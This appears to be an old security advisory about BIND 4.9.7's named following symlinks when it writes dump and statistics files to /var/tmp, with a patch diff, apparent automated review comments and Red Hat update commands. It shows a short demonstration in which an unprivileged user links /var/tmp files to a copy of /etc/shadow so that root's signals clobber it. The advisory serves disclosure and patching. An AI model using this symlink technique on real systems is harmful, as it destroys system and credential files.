COMMAND
BIND
SYSTEMS AFFECTED
Systems running BIND 4.9.7
PROBLEM
Joe H. found the following. The new named(8) happily follows symlinks
and clobbers any file on the system when it receives a SIGINT.
SIGINT (used for debugging and statistics gathering) dumps the
named database to /var/tmp/named_dump.db. It will also happily
append data to any system file when it receives a SIGIOT. SIGIOT
appends named statistics to /var/tmp/named.stats. This problem
probably also exists in previous versions of named, but that is not
confirmed. This was tested under RedHat 4.2 Linux 2.0.30 i586.
The in.named(8) man page mentions that sending a SIGINT to the
in.named process will dump the current data base and cache to, by
default, /var/tmp/named_dump.db. Some sites may find this useful
in looking for self-referential CNAMEs. Please see the
in.named(8) man page for further details. Quick check shows:
[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 992 Apr 10 12:52 junk.shadow
Now as a non-priv user..
[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout
(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is
toast...)
[root]# kill -SIGIOT [named.pid]
[root]# ls -al /etc/junk.shadow
-r-------- 1 root root 2251 Apr 10 13:00 /etc/junk.shadow
[root]# less /etc/junk.shadow
someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
+++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
2368 time since boot (secs)
2368 time since reset (secs)
0 Unknown query types
[SNIP]
The statistics dump gets appended to any file on the system. Now
for the real horror:
[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r-------- 1 root root 5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow
; Dumped at Fri Apr 10 13:02:40 1998
;; ++zone table++
[SNIP]
No trace of the original remains. Your shadow password file or
anything else on the system is fried.
SOLUTION
Since 4.9.7 is a security-related patch anyway, this will be fixed
before declaring 4.9.7-REL. Mark Andrews posted a patch that
addresses these issues and a few others by changing 4.9.7 to do what
8.1.x does, i.e. use the directory specified in named.{boot,conf}
for temporaries and debug dumps:
*** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
--- named/ns_init.c Sun Apr 12 13:12:05 1998
***************
*** 560,567 ****
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "%s/NsTmp%ld.%d", _PATH_TMPDIR,
! (long)getpid(), tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
--- 560,567 ----
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
! tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
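Review bot: The new `sprintf(buf, "NsTmp%ld.%d", ...)` name is relative, so where the temporary is created depends entirely on named's current directory at this point; the hunk shows no chdir to the named.{boot,conf} directory, so if no directory is configured, or this runs before that chdir, the file lands wherever named was started and the symlink exposure described above presumably just moves there. A comment on the changed line would make the dependency explicit, e.g. `/* relative: lives in the directory named.{boot,conf} chdir'd to, never in _PATH_TMPDIR */`, and if the configured directory can be unset, a check for that belongs near here. The enclosing function begins and ends outside the hunk.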
*** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
--- named/ns_main.c Sun Apr 12 14:51:45 1998
***************
*** 1463,1469 ****
dprintf(1, (ddt, "sigprof()\n"));
if (fork() == 0)
{
- (void) chdir(_PATH_TMPDIR);
exit(1);
}
errno = save_errno;
--- 1463,1468 ----
*** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
--- named/pathnames.h Sat Apr 11 10:57:45 1998
***************
*** 74,88 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "/var/tmp/named.run"
! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "/var/tmp/named.stats"
! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"
#else /* BSD */
--- 74,88 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"
#else /* BSD */
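Review bot: `_PATH_TMPDIR` is left as the world-writable `/var/tmp` (and `/usr/tmp` in the second pathnames.h hunk) while every other output path in the hunk is made relative; any surviving use of it for file creation keeps exactly the symlink exposure the relative names were introduced to remove, and it is not visible from here whether such a use remains after the ns_init.c change. Either drop the macro if it is now unused, or mark its remaining purpose, e.g. `/* world-writable; never create output files here, use the configured directory */`. The same applies to the second pathnames.h hunk below.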
***************
*** 92,106 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "/usr/tmp/named.run"
! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "/usr/tmp/named.stats"
! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */
--- 92,106 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */
These problems affect users of Red Hat 4.2, 5.0, and 5.1. Red Hat
strongly suggests all users update to these new versions as soon
as possible. After upgrading to the new version of bind, be sure
to restart bind with:
/etc/rc.d/init.d/bind stop
/etc/rc.d/init.d/bind start
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/alpha/bind-4.9.7-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.1/sparc/bind-4.9.7-1.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/i386/bind-4.9.7-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/alpha/bind-4.9.7-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/bind-4.9.7-0.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/bind-4.9.7-0.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/bind-4.9.7-0.sparc.rpm